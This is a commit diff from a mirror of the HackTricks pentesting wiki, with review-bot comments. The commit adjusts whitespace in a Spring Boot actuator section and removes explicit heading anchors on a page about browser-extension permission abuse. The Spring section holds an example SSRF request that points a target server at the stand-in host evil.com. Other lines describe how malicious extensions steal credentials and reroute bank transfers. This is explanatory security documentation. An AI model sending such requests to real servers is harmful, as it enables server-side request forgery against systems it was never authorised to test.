mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
f
parent
cc776534e2
commit
364e26191e
@ -52,16 +52,16 @@
|
||||
|
||||
1. **Env + H2 RCE**:
|
||||
- Details on exploiting the combination of `/env` endpoint and H2 database can be found [here](https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database).
|
||||
|
||||
2. **SSRF on Spring Boot Through Incorrect Pathname Interpretation**:
|
||||
- The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
|
||||
- Example exploit request:
|
||||
|
||||
- The Spring framework's handling of matrix parameters (`;`) in HTTP pathnames can be exploited for Server-Side Request Forgery (SSRF).
|
||||
- Example exploit request:
|
||||
|
||||
```http
|
||||
GET ;@evil.com/url HTTP/1.1
|
||||
Host: target.com
|
||||
Connection: close
|
||||
```
|
||||
```http
|
||||
GET ;@evil.com/url HTTP/1.1
|
||||
Host: target.com
|
||||
Connection: close
|
||||
```
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
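Review bot: In item 2 (SSRF through incorrect pathname interpretation), the two bullets and the `http` example appear on both sides of the hunk with identical text as rendered here, so the change looks whitespace-only, and the commit message does not say so; please state the intent in the message. While this block is being touched, item 2 has no reference and does not say which component ends up issuing the outbound request, unlike item 1, which links a write-up. Adding a source link and one sentence on the preconditions would let readers judge whether their deployment is exposed and what to check in their routing layer.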
@ -59,7 +59,7 @@ Both APIs allow executing not merely files contained in the extensions as conten
|
||||
> [!CAUTION]
|
||||
> In addition to the capabilities above, content scripts could for example **intercept credentials** as these are entered into web pages. Another classic way to abuse them is **injecting advertising** on each an every website. Adding **scam messages** to abuse credibility of news websites is also possible. Finally, they could **manipulate banking** websites to reroute money transfers.
|
||||
|
||||
### Implicit privileges <a href="#implicit-privileges" id="implicit-privileges"></a>
|
||||
### Implicit privileges
|
||||
|
||||
Some extension privileges **don’t have to be explicitly declared**. One example is the [tabs API](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs): its basic functionality is accessible without any privileges whatsoever. Any extension can be notified when you open and close tabs, it merely won’t know which website these tabs correspond with.
|
||||
|
||||
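Review bot: The "Implicit privileges" heading loses its explicit `<a href="#implicit-privileges" id="implicit-privileges"></a>` anchor, so the fragment now depends on the renderer generating the same id from the heading text. Please confirm the built page still exposes `#implicit-privileges` and search the repository for links to that fragment before merging. Separately, the CAUTION context line above the heading reads "each an every website"; that should be "each and every" and could be fixed in the same pass.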
@ -72,7 +72,7 @@ If you look through possible `tabs.create()` parameters, you’ll also notice th
|
||||
|
||||
[**tabs.update()**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/tabs/update) is very similar to `tabs.create()` but will **modify an existing tab**. So a malicious extension can for example arbitrarily load an advertising page into one of your tabs, and it can activate the corresponding tab as well.
|
||||
|
||||
### Webcam, geolocation and friends <a href="#webcam-geolocation-and-friends" id="webcam-geolocation-and-friends"></a>
|
||||
### Webcam, geolocation and friends
|
||||
|
||||
You probably know that websites can request special permissions, e.g. in order to access your webcam (video conferencing tools) or geographical location (maps). It’s features with considerable potential for abuse, so users each time have to confirm that they still want this.
|
||||
|
||||
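Review bot: The "Webcam, geolocation and friends" heading contains a comma, so whether an auto-generated id matches the removed `webcam-geolocation-and-friends` depends on how the renderer handles punctuation. Build the page and check the resulting fragment, or keep the explicit anchor on this heading if the generated id differs.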
@ -87,7 +87,7 @@ Adding the **`history`** keyword to the [permissions entry](https://developer.mo
|
||||
|
||||
The **`bookmarks`** **permission** has similar abuse potential, this one allows **reading out all bookmarks via the** [**bookmarks API**](https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions/API/bookmarks).
|
||||
|
||||
### Storage permission <a href="#the-storage-permission" id="the-storage-permission"></a>
|
||||
### Storage permission
|
||||
|
||||
The extension storage is merely a key-value collection, very similar to [localStorage](https://developer.mozilla.org/en-US/docs/Web/API/Window/localStorage) that any website could use. So no sensitive information should be stored here.
|
||||
|
||||
|
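Review bot: On the "Storage permission" heading, the removed anchor id is `the-storage-permission`, which does not match the heading text, so an id generated from "Storage permission" cannot reproduce it and any link to `#the-storage-permission` will stop resolving. Either keep the explicit anchor here or search for that fragment and update the links in the same commit.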